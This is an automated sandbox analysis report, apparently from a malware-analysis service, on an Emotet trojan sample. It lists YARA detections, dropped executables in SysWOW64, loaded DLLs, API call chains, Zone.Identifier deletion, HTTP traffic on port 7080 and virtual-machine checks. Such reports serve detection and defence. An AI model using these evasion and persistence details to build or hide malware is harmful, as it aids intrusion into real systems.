              Source: 2.2.dfscli.exe.2230000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (233).exe.2260000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 2.2.dfscli.exe.219279e.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 3.2.mibincodec.exe.218279e.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 3.2.mibincodec.exe.21f0000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 2.2.dfscli.exe.219052e.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000003.00000002.3346727228.00000000021B4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000002.00000002.2117416875.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000003.00000002.3346601105.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000000.00000002.2113874721.00000000021F4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000002.00000002.2117499906.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: classification engine | Classification label: mal100.troj.evad.winEXE@6/0@0/100
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,0_2_022687D0
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,2_2_022387D0
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Code function: 3_2_021F4CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32FirstW,Process32NextW,CloseHandle,FindCloseChangeNotification,3_2_021F4CB0
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_00403250 FindResourceA,0_2_00403250
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_02265070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,0_2_02265070
              Source: ExeFile (233).exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\ExeFile (233).exe | File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: ExeFile (233).exe | ReversingLabs: Detection: 81%
              Source: unknown | Process created: C:\Users\user\Desktop\ExeFile (233).exe "C:\Users\user\Desktop\ExeFile (233).exe"
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Process created: C:\Windows\SysWOW64\rtmpal\dfscli.exe "C:\Windows\SysWOW64\rtmpal\dfscli.exe"
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Process created: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe "C:\Windows\SysWOW64\KBDTZM\mibincodec.exe"
              Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Process created: C:\Windows\SysWOW64\rtmpal\dfscli.exe "C:\Windows\SysWOW64\rtmpal\dfscli.exe"
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Process created: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe "C:\Windows\SysWOW64\KBDTZM\mibincodec.exe"
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: oledlg.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: feclient.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: msv1_0.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: ntlmshared.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: cryptdll.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: wtsapi32.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: windows.fileexplorer.common.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: oledlg.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: feclient.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: msv1_0.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: ntlmshared.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: cryptdll.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: wtsapi32.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: windows.fileexplorer.common.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: oledlg.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: feclient.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: msv1_0.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: ntlmshared.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: cryptdll.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: wtsapi32.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: licensemanagersvc.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: licensemanager.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: clipc.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_00402530 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,0_2_00402530
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_0040F54B push ecx; ret 0_2_0040F55B
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_0040E770 push eax; ret 0_2_0040E784
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_0040E770 push eax; ret 0_2_0040E7AC
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_0040EA88 push eax; ret 0_2_0040EAA6
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_02265E10 push ecx; mov dword ptr [esp], 0000F5B3h 0_2_02265E11
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_02265EA0 push ecx; mov dword ptr [esp], 0000A3FDh 0_2_02265EA1
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_02265EF0 push ecx; mov dword ptr [esp], 0000669Ch 0_2_02265EF1
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_02265F20 push ecx; mov dword ptr [esp], 0000E36Ch 0_2_02265F21
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_02265CD0 push ecx; mov dword ptr [esp], 00001CE1h 0_2_02265CD1
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_02265D20 push ecx; mov dword ptr [esp], 0000C5A1h 0_2_02265D21
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_02265D00 push ecx; mov dword ptr [esp], 00001F9Eh 0_2_02265D01
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_02265D50 push ecx; mov dword ptr [esp], 00006847h 0_2_02265D51
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_02265D90 push ecx; mov dword ptr [esp], 0000B2E0h 0_2_02265D91
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_02265DF0 push ecx; mov dword ptr [esp], 0000AAF5h 0_2_02265DF1
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_02265DC0 push ecx; mov dword ptr [esp], 000089FAh 0_2_02265DC1
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_021C7A3E push ecx; mov dword ptr [esp], 0000A3FDh 0_2_021C7A3F
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_021C7A8E push ecx; mov dword ptr [esp], 0000669Ch 0_2_021C7A8F
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_021C7ABE push ecx; mov dword ptr [esp], 0000E36Ch 0_2_021C7ABF
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_021C786E push ecx; mov dword ptr [esp], 00001CE1h 0_2_021C786F
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_021C789E push ecx; mov dword ptr [esp], 00001F9Eh 0_2_021C789F
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_021C78BE push ecx; mov dword ptr [esp], 0000C5A1h 0_2_021C78BF
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_021C78EE push ecx; mov dword ptr [esp], 00006847h 0_2_021C78EF
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_021C792E push ecx; mov dword ptr [esp], 0000B2E0h 0_2_021C792F
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_021C795E push ecx; mov dword ptr [esp], 000089FAh 0_2_021C795F
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_021C798E push ecx; mov dword ptr [esp], 0000AAF5h 0_2_021C798F
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_021C79AE push ecx; mov dword ptr [esp], 0000F5B3h 0_2_021C79AF
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Code function: 2_2_0040F54B push ecx; ret 2_2_0040F55B
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Code function: 2_2_0040E770 push eax; ret 2_2_0040E784
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Code function: 2_2_0040E770 push eax; ret 2_2_0040E7AC
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Code function: 2_2_0040EA88 push eax; ret 2_2_0040EAA6
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Code function: 2_2_02235E10 push ecx; mov dword ptr [esp], 0000F5B3h 2_2_02235E11

              Persistence and Installation Behavior

              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Executable created and started: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Executable created and started: C:\Windows\SysWOW64\rtmpal\dfscli.exe
              Source: C:\Users\user\Desktop\ExeFile (233).exe | PE file moved: C:\Windows\SysWOW64\rtmpal\dfscli.exe

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Users\user\Desktop\ExeFile (233).exe | File opened: C:\Windows\SysWOW64\rtmpal\dfscli.exe:Zone.Identifier read attributes | delete
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | File opened: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe:Zone.Identifier read attributes | delete
              Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 7080
              Source: unknown | Network traffic detected: HTTP traffic on port 7080 -> 49739
              Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 7080
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_00405138 IsIconic,GetWindowPlacement,GetWindowRect,0_2_00405138
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_00403550 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_00403550
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Code function: 2_2_00405138 IsIconic,GetWindowPlacement,GetWindowRect,2_2_00405138
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Code function: 2_2_00403550 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,2_2_00403550
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_2-36653
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_0-36575
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,0_2_02265070
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,2_2_02235070
              Source: C:\Users\user\Desktop\ExeFile (233).exe | API coverage: 5.7 %
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | API coverage: 5.7 %
              Source: C:\Users\user\Desktop\ExeFile (233).exe TID: 2948 | Thread sleep time: -60000s >= -30000s
              Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\ExeFile (233).exe | File Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | File Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_00424A99 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_00424A99
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_022638F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,0_2_022638F0
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Code function: 2_2_00424A99 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,2_2_00424A99
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exe | Code function: 2_2_022338F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,2_2_022338F0
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe | Code function: 3_2_021F38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,3_2_021F38F0
              Source: C:\Users\user\Desktop\ExeFile (233).exe | Code function: 0_2_0040E573 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_0040E573
              Source: mibincodec.exe, 00000003.00000002.3346168419.0000000000690000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: mibincodec.exe, 00000003.00000002.3347478744.0000000002562000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
              Source: ExeFile (233).exe, 00000000.00000002.2114163895.0000000002914000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56s
              Source: C:\Users\user\Desktop\ExeFile (233).exeAPI call chain: ExitProcess graph end nodegraph_0-36746
